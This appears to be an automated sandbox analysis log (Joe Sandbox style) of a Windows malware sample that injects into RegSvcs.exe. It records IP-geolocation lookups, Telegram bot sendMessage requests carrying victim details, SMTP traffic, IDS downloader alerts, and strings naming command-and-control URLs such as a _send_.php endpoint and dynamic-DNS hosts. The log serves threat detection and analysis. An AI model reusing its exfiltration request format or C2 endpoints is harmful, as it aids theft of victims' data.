                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49719 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49736 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49838 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49820 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49718 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49788 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49760 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49876 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49833 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49896 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49808 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49844 -> 104.21.16.1:443
                Source: global trafficTCP traffic: 192.168.2.6:49871 -> 3.130.71.34:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49712 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49826 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00B2CE44
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.acadental.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 18:11:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 18:11:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.acadental.com
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000009.00000002.3370233231.0000000003147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000302A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000009.00000002.3370233231.0000000003179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
